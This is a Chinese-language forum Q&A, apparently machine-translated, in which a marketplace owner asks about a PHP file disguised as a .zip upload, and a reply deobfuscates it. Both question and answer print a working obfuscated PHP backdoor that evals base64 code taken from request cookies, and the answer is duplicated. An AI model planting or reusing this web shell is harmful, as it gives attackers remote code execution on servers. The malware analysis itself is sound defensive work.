我拥有一个数字商品市场,供应商上传了这个文件,它是一个zip文件,但在Windows中显示为腐败.当我在linux中打开它时,我很震惊地看到文件本身是一个php文件,有人添加了.zip扩展名.
以前有人见过这样的代码吗?任何人都可以帮助我理解它吗?它是恶意的吗?
这是我到目前为止所拥有的.
$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))
$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '';}
Schiem.. 5
TL; DR此代码允许人们使用cookie在您的服务器上执行任意脚本
代码正在做的是使用一堆随机base64字符串来创建一个函数,然后立即执行它.我花了一些时间对函数进行去混淆,给出以下内容:
if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
echo '';
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
echo ' ';}
重要的是这一行:
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
让我们把它分解成几部分:
join(array_slice($_COOKIE,count($_COOKIE)-3))
这个部分将$ _COOKIE数组中的所有项连接起来,从count($ _ COOKIE)开始 - 3直到数组结束(将它全部变为一个字符串)
preg_replace(array('/[^\w=\s]'','/\s/'), array('','+')
首先,它在新创建的字符串中搜索模式"example ='"(其中示例可以是任何单词)并将其替换为Nothing.所以如果字符串有:
test= 'blah'它会被替换为blah'.
这也用+替换所有空格.
eval(base64_decode(..));
这将获取刚刚创建的字符串(可能是base64中的内容)并将其解码为人类可读的格式.然后它接受该字符串并在服务器上执行它.
基本上,这意味着有人可以在他们的机器上创建一些基本64的cookie,你的服务器将它们粉碎成一个长字符串,解码并执行它.
TL; DR此代码允许人们使用cookie在您的服务器上执行任意脚本
代码正在做的是使用一堆随机base64字符串来创建一个函数,然后立即执行它.我花了一些时间对函数进行去混淆,给出以下内容:
if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
echo '';
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
echo ' ';}
重要的是这一行:
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
让我们把它分解成几部分:
join(array_slice($_COOKIE,count($_COOKIE)-3))
这个部分将$ _COOKIE数组中的所有项连接起来,从count($ _ COOKIE)开始 - 3直到数组结束(将它全部变为一个字符串)
preg_replace(array('/[^\w=\s]'','/\s/'), array('','+')
首先,它在新创建的字符串中搜索模式"example ='"(其中示例可以是任何单词)并将其替换为Nothing.所以如果字符串有:
test= 'blah'它会被替换为blah'.
这也用+替换所有空格.
eval(base64_decode(..));
这将获取刚刚创建的字符串(可能是base64中的内容)并将其解码为人类可读的格式.然后它接受该字符串并在服务器上执行它.
基本上,这意味着有人可以在他们的机器上创建一些基本64的cookie,你的服务器将它们粉碎成一个长字符串,解码并执行它.
京公网安备 11010802040832号 | 京ICP备19059560号-6 